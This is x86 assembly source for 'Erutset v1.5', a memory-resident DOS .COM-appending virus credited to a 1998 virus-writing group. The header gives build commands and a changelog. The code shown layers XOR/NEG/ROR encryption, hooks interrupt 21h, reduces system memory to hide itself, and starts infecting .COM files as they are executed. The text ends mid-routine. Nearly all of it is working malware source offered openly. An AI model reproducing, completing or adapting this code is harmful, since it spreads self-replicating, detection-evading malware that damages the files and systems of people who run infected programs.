; ------------------------------------------------------------------------- ;
; Erutset v1.5 coded by KilJaeden of the Codebreakers 1998 ;
; ------------------------------------------------------------------------- ;
; Description: `-------------------| Started: 19/06/98 | Finished: 19/06/98 ;
; `-------------------^------------------- ;
; v1.0 - Memory resident .com appender, infects upon execution | Size: 637 ;
; v1.1 - restores time/date & attributes also infects readonly `---------- ;
; v1.2 - now has a single layer of XOR,NEG,ROR encryption ;
; v1.3 - added a second layer of XOR,NEG,NOT,ROR,ROL encryption ;
; v1.4 - added a third layer of XOR,NEG,NOT,ROR,ROL encryption ;
; v1.5 - added a small payload, prints a string and waits for keypress ;
; ------------------------------------------------------------------------- ;
; --------> Dedicated to the hate of all the '31337 h4x0rs' on IRC <------- ;
; ------------------------------------------------------------------------- ;
; to compile ::] tasm erutset.asm ;
; to link :::::] tlink /t erutset.obj ;
; ------------------------------------------------------------------------- ;
code segment ; name our segment 'code'
assume cs:code,ds:code ; assign CS and DS to code
org 100h ; this be a .com file
.286 ; needed for pusha/popa
jumps ; save space wasted jumping
blank: db 0e9h,0,0 ; jump to start of code
start: call delta ; push IP on to stack
delta: pop bp ; pop it into bp
sub bp,offset delta ; get the delta offset
decr: jmp once ; jump to once (overwritten)
lea si,[bp+encd] ; load the source index up
mov di,si ; move it into DI
call encr ; decrypt the 1st layer
; --------------------( Start Of 1st Encryption Blanket )------------------ ;
; ------------------------------------------------------------------------- ;
encd: lea si,[bp+d_encd] ; load the source index up
mov di,si ; move it into DI again
mov cx,d_encr-d_encd ; # of bytes to decrypt
call d_encr ; decrypt the 2nd layer
; --------------------( Start Of 2nd Encryption Blanket )------------------ ;
; ------------------------------------------------------------------------- ;
d_encd: lea si,[bp+t_encd] ; load the source index up
mov di,si ; move it into DI again
mov cx,t_encr-t_encd ; # of bytes to decrypt
call t_encr ; decrypt the 3rd layer
; --------------------( Start Of 3rd Encryption Blanket )------------------ ;
; ------------------------------------------------------------------------- ;
t_encd: call pload ; check if payload time
mov ax,0deadh ; check if already resident
int 21h ; if we are, bx = 0deadh now
cmp bx,0deadh ; does bx hold 0deadh ?
je first3 ; we are already resident!
sub word ptr cs:[2],80h ; lower top of PSP mem data
mov ax,cs ; move CS into AX
dec ax ; decrement AX
mov ds,ax ; move AX into DS
sub word ptr ds:[3],80h ; sub 2kb from accessed MCB
xor ax,ax ; xor the value in ax to 0
mov ds,ax ; move that value into DS
sub word ptr ds:[413h],2 ; adjust BIOS data by 2kb
mov ax,word ptr ds:[413h] ; move adjusted BIOS data
mov cl,6 ; load cl with value of 6
shl ax,cl ; multiply BIOS mem by 64
mov es,ax ; move value into ES
push cs ; push value of code segment
pop ds ; into data segment register
xor di,di ; xor value in DI to 0
lea si,[bp+start] ; load the source index
mov cx,finished-start ; # of bytes to load up
rep movsb ; load virus into memory
xor ax,ax ; value in ax to 0
mov ds,ax ; move value into DS
lea ax,isr ; point IVT to new ISR
sub ax,offset start ; subtract start offset
mov bx,es ; move es into bx
cli ; interrupts off
xchg ax,word ptr ds:[84h] ; switch old/new int 21h
xchg bx,word ptr ds:[86h] ; switch old/new int 21h
mov word ptr es:[oi21-offset start],ax ; save the old int 21h
mov word ptr es:[oi21+2-offset start],bx ; save the old int 21h
sti ; interrupts on
push cs cs ; push code segment twice
pop ds es ; into DS and ES registers
first3: lea si,[bp+saved] ; load up the source index
mov di,100h ; load the destination index
push di ; push 100h on to the stack
movsw ; move two bytes now
movsb ; move one byte now
retn ; return control to host
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
isr: pushf ; push all flags
cmp ax,0deadh ; are we testing if resident?
jne exec ; nope, check for execution
mov bx,0deadh ; yup, show them we are here
popf ; pop all flags
iret ; pop cs:ip+flags from stack
exec: pusha ; push all registers
push ds ; push data segment register
push es ; push extra segment register
cmp ah,4bh ; something being executed?
je infect ; yup! infect the file
exit: pop es ; pop ES from the stack
pop ds ; pop DS from the stack
popa ; pop all registers
popf ; pop all flags
old21: db 0eah ; jump to original ISR
oi21 dd ? ; old int 21 goes here
ret ; return from call
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
infect: push bp ; save original delta offset
call tsrdel ; push IP on to stack again
tsrdel: pop bp ; pop it into bp
sub bp,offset tsrdel ; get the 2nd delta offset
push ds ; push DS on to stack
pop es ; pop it into es
mov di,dx ; move file handle into di
mov cx,64 ; 64 byte filename possible
mov al,'.' ; load al with the .
cld ; clear direction flag
repnz scasb ; scan until . is hit
cmp word ptr ds:[di],'OC' ; is the file .CO- ?
jne abort ; not it isn't, abort
cmp word ptr ds:[di+2],'M' ; is the file .--M ?
jne abort ; no it isn't, abort
mov ax,4300h ; get file attributes
int 21h ; get them now
push cx ; push the attributes
push dx ; push the file name
mov ax,4301h ; set file attributes
xor cx,cx ; to no attributes at all
int 21h ; ready for infection
mov ax,3d02h ; open the file read/write
int 21h ; open the file now
xchg bx,ax ; move the file handle
push cs cs ; push CS on to stack twice
pop ds es ; pop it into DS and ES
mov ax,5700h ; get time/date stamps
int 21h ; get them now
push dx ; save the date
push cx ; save the time
mov ah,3fh ; the read function
lea dx,[bp+saved] ; record the bytes here
mov cx,3 ; read first three bytes